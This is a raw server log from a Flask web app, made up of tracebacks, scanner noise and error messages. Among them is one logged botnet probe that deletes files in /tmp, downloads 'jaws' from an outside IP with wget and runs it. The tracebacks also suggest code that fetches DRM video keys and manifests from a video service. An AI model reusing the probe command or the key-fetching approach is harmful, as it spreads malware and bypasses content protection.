  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 63, in __call__
    return self.engineio_app.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/socketio/server.py", line 433, in handle_request
    return self.eio.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/engineio/server.py", line 292, in handle_request
    socket = self._get_socket(sid)
  File "/usr/local/lib/python3.10/dist-packages/engineio/base_server.py", line 229, in _get_socket
    raise KeyError('Session is disconnected')
KeyError: 'Session is disconnected'
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 63, in __call__
    return self.engineio_app.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/socketio/server.py", line 433, in handle_request
    return self.eio.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/engineio/server.py", line 272, in handle_request
    socket = self._get_socket(sid)
  File "/usr/local/lib/python3.10/dist-packages/engineio/base_server.py", line 229, in _get_socket
    raise KeyError('Session is disconnected')
KeyError: 'Session is disconnected'
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 63, in __call__
    return self.engineio_app.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/socketio/server.py", line 433, in handle_request
    return self.eio.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/engineio/server.py", line 272, in handle_request
    socket = self._get_socket(sid)
  File "/usr/local/lib/python3.10/dist-packages/engineio/base_server.py", line 229, in _get_socket
    raise KeyError('Session is disconnected')
KeyError: 'Session is disconnected'
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 63, in __call__
    return self.engineio_app.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/socketio/server.py", line 433, in handle_request
    return self.eio.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/engineio/server.py", line 272, in handle_request
    socket = self._get_socket(sid)
  File "/usr/local/lib/python3.10/dist-packages/engineio/base_server.py", line 229, in _get_socket
    raise KeyError('Session is disconnected')
KeyError: 'Session is disconnected'
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 63, in __call__
    return self.engineio_app.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/socketio/server.py", line 433, in handle_request
    return self.eio.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/engineio/server.py", line 272, in handle_request
    socket = self._get_socket(sid)
  File "/usr/local/lib/python3.10/dist-packages/engineio/base_server.py", line 229, in _get_socket
    raise KeyError('Session is disconnected')
KeyError: 'Session is disconnected'
104.45.227.163 - - [26/Nov/2024 01:09:36] code 400, message Bad request syntax ('MGLNDD_47.250.51.78_80')
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/root/spysnet/website/views.py", line 2023, in english_assignment
    for i, word in enumerate(data["words"], start=1):
KeyError: 'words'
5.135.238.147 - - [26/Nov/2024 02:58:08] code 400, message Bad request version ('À#À¬À®À+À')
54.38.100.146 - - [26/Nov/2024 03:05:01] code 400, message Bad request version ('À#À¬À®À+À')
45.79.181.104 - - [26/Nov/2024 04:28:13] code 400, message Bad request version ('À\x13À')
209.38.23.177 - - [26/Nov/2024 05:04:11] code 400, message Bad request version ('À\x14À')
209.38.23.177 - - [26/Nov/2024 05:04:11] code 400, message Bad request version ('À\x14À')
5.8.11.202 - - [26/Nov/2024 05:29:56] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
b'{"code":2074,"message":"Please update app from Play Store","isErrorRecoverable":true}'
b'{"code":2074,"message":"Please update app from Play Store","isErrorRecoverable":true}'
No OTP found in the decoded string.
No playbackInfo found in the decoded string.
No OTP found in the decoded string.
No playbackInfo found in the decoded string.
b'{"code":2014,"message":"Domain not allowed"}'
b'{"code":2014,"message":"Domain not allowed"}'
No OTP found in the decoded string.
No playbackInfo found in the decoded string.
b'{"code":2074,"message":"Please update app from Play Store","isErrorRecoverable":true}'
b'{"code":2074,"message":"Please update app from Play Store","isErrorRecoverable":true}'
205.210.31.220 - - [26/Nov/2024 06:14:06] code 400, message Bad request version ('b\x9bÛn!ø¢Æð\x9b\x7f7')
205.210.31.220 - - [26/Nov/2024 06:14:07] code 400, message Bad request version ('À(À$À\x14À')
78.153.140.224 - - [26/Nov/2024 06:21:18] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x00¬\x01\x00\x00¨\x03\x03\xad\x19à\x7f]\x18¥Ù\x02\x19\x88=\x9dHý,àM]~\x04Ý\x9a')
152.42.243.206 - - [26/Nov/2024 08:02:50] code 400, message Bad request version ('À\x13À')
152.42.214.140 - - [26/Nov/2024 08:02:53] code 400, message Bad request version ('À\x13À')
64.62.156.15 - - [26/Nov/2024 09:58:34] code 400, message Bad request version ('À\x14À')
66.240.205.34 - - [26/Nov/2024 10:57:58] code 400, message Bad request version ('ô')
66.240.205.34 - - [26/Nov/2024 14:04:49] code 400, message Bad request version ('®¯]')
104.236.3.45 - - [26/Nov/2024 14:19:16] code 400, message Bad request syntax ('GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws HTTP/1.1')
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/root/spysnet/website/vdo.py", line 944, in ink
    c_keys , mpd = getkeys_ink(token , xotp , ins)
  File "/root/spysnet/website/vdo.py", line 856, in getkeys_ink
    mpd = get_mpd_ink(token , xotp)
  File "/root/spysnet/website/vdo.py", line 833, in get_mpd_ink
    req.raise_for_status()  # Raise an exception if the request fails
  File "/usr/local/lib/python3.10/dist-packages/requests/models.py", line 1024, in raise_for_status
    raise HTTPError(http_error_msg, response=self)
requests.exceptions.HTTPError: 403 Client Error: Forbidden for url: https://api.inkryptvideos.com/api/s1/v_info/6acf3c7ac0b3467ab31569d0865a1b5a
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/root/spysnet/website/vdo.py", line 944, in ink
    c_keys , mpd = getkeys_ink(token , xotp , ins)
  File "/root/spysnet/website/vdo.py", line 856, in getkeys_ink
    mpd = get_mpd_ink(token , xotp)
  File "/root/spysnet/website/vdo.py", line 833, in get_mpd_ink
    req.raise_for_status()  # Raise an exception if the request fails
  File "/usr/local/lib/python3.10/dist-packages/requests/models.py", line 1024, in raise_for_status
    raise HTTPError(http_error_msg, response=self)
requests.exceptions.HTTPError: 403 Client Error: Forbidden for url: https://api.inkryptvideos.com/api/s1/v_info/6acf3c7ac0b3467ab31569d0865a1b5a
205.210.31.139 - - [26/Nov/2024 16:02:44] code 400, message Bad request version ('À\x13À')
205.210.31.139 - - [26/Nov/2024 16:02:44] code 400, message Bad request version ('À(À$À\x14À')
159.223.67.34 - - [26/Nov/2024 16:03:07] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x01')
80.66.76.121 - - [26/Nov/2024 17:08:34] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
185.100.87.136 - - [26/Nov/2024 18:20:33] code 400, message Bad HTTP/0.9 request type ('\x83F\x02\x00\x15\x00\x00\x00R%}gI\\m')
5.8.11.202 - - [26/Nov/2024 19:07:04] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
178.128.54.126 - - [27/Nov/2024 00:03:10] code 400, message Bad request version ('ÅËÊ-\\ý\x8a')
159.223.69.51 - - [27/Nov/2024 00:03:17] code 400, message Bad request version ('\x98Ä\x7fþ8\x8bR\x06,#\x82hL')
146.190.241.67 - - [27/Nov/2024 00:08:39] code 400, message Bad HTTP/0.9 request type ('\x00\x0e8;g')
93.174.93.12 - - [27/Nov/2024 00:17:00] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/root/spysnet/website/vdo.py", line 944, in ink
    c_keys , mpd = getkeys_ink(token , xotp , ins)
  File "/root/spysnet/website/vdo.py", line 856, in getkeys_ink
    mpd = get_mpd_ink(token , xotp)
  File "/root/spysnet/website/vdo.py", line 833, in get_mpd_ink
    req.raise_for_status()  # Raise an exception if the request fails
  File "/usr/local/lib/python3.10/dist-packages/requests/models.py", line 1024, in raise_for_status
    raise HTTPError(http_error_msg, response=self)
requests.exceptions.HTTPError: 403 Client Error: Forbidden for url: https://api.inkryptvideos.com/api/s1/v_info/e165b91a2d274852b6ffddc1da67f58f
172.105.128.13 - - [27/Nov/2024 02:42:39] code 400, message Bad request version ('À\x13À')
94.156.166.117 - - [27/Nov/2024 02:47:02] code 400, message Bad request syntax ('\x04\x01\x01»Ô/ú\x0e\x00')
